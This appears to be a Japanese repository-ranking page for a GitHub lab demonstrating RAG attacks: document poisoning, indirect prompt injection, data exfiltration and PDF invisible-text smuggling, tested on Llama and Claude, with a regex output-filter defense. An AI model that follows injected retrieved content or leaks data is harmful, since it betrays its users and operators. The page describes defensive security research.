← ランキング · AI関連リポジトリ

KezoSec/rag-poisoning-lab

A self-contained AI security lab demonstrating document poisoning, indirect prompt injection, and data exfiltration in RAG systems. Explores the "helpfulness paradox" across local and frontier LLMs.

⚡ AI使用 Python MIT GitHub ↗

★ 0

stars

100

AI関連スコア

個人開発度

AIツール痕跡

SUMMARY AI要約 by gpt-5-mini

A self-contained Docker lab that demonstrates four classes of attacks against Retrieval-Augmented Generation (RAG) systems and defenses, validated on a local model (Llama 3.2 3B) and a frontier model (Claude Haiku 4.5). Intended for security researchers, red teams, and engineers building/defending RAG pipelines. Key features: - Reproducible attack scripts that inject payloads into a Chroma vector DB (document poisoning, indirect prompt injection, data exfiltration, PDF invisible-text smuggling). - Local offline Llama via Ollama and optional Anthropic Claude integration; sentence-transformers embeddings; Docker Compose orchestration. - Working defense: regex-based output filter and JSON evidence for each outcome. - Headline finding: stronger reasoning/helpfulness in frontier models can increase susceptibility to content-poisoning; model safety is shape-based, so retrieval-layer controls are required.

DETECTED 検出されたAIスタック

このRepoのdescription / GitHub topics / READMEのAI要約に出現したAI関連キーワードをカテゴリ別に表示。各バッジは該当カテゴリの詳細ランキングへリンクします。

🧠 LLMプロバイダー (2)

Anthropic Ollama

🗄️ ベクトルDB (1)

Chroma

🔢 埋め込みモデル (1)

sentence-transformers

🤖 LLMモデル (2)

Claude Llama

GitHub Topics

#ai-security #claude #llama #llm-security #prompt-injection #rag #red-teaming

使用言語(バイト数比)

Shell

15.4%

Python

81.5%

Dockerfile

3.1%

オーナー情報

アカウント

KezoSec

タイプ

User

フォロワー

日付

GitHub作成日	2026-05-09
最終Push	2026-05-09
当サイト初検出	2026-05-09
最終取得	2026-05-09 15:42

類似Repo (同じ言語のAI関連Repo)

bgzhang1/sw2api

Reverse proxy for your ai quota from the SW platform.

Python ★ 19 AI 45

dea6cat/2b-agent

This llm Agent was created based on necessity for one that could simply use local models without making them hallucinate and keep them focus

Python ★ 1 AI 75

Zuboy/Carbon-Cost-Optimizer-Agentic-AI

An AI agent that decides where and when to run ML training jobs to minimize cost and carbon emissions, then launches them autonomously — exposed entirely through MCP tools.

Python ★ 1 AI 75

FuchaZ/lm-studio-vision-bridge

给纯文本 AI agent 装上眼睛——通过 LM Studio 本地视觉模型提供 MCP 图片识别服务

Python ★ 1 AI 45

Shrutirowlo/AI-Video-Agent

AI-powered video generation agent that automates script analysis, scene planning, and video creation.

Python ★ 1 AI 75

Shivang0/social-vision

Paste an Instagram/TikTok/YouTube/X link and Claude watches it for you — transcribes audio, reads on-screen text & visuals, explains what it's about. Local, cross-platform Claude Code plugin.

Python ★ 1 AI 70

markusbegerow/claude-fuer-oeffentliche-verwaltung

⚠️ Experimentelle Skill-Sammlung für Digitalisierung, Fachverfahren und Organisation der deutschen öffentlichen Verwaltung (OZG, FIM, FIT-Connect, KI-Einsatz, eIDAS, BSI-IT-Grundschutz, DSGVO) – bitte testen, Issues/PRs willkommen! Keine Rechts-/Datenschutzberatung, keine verbindliche Behördenentscheidung. Keine Bürger-/Mitarbeiterdaten im Repo.

Python ★ 1 AI 75

knowledgegut/course-distiller

把有權使用的工作坊/課程回放消化成套品牌色的步驟式學習 PDF；最後的重組交還人腦。A Claude Code skill by 知識包小腸.

Python ★ 1 AI 45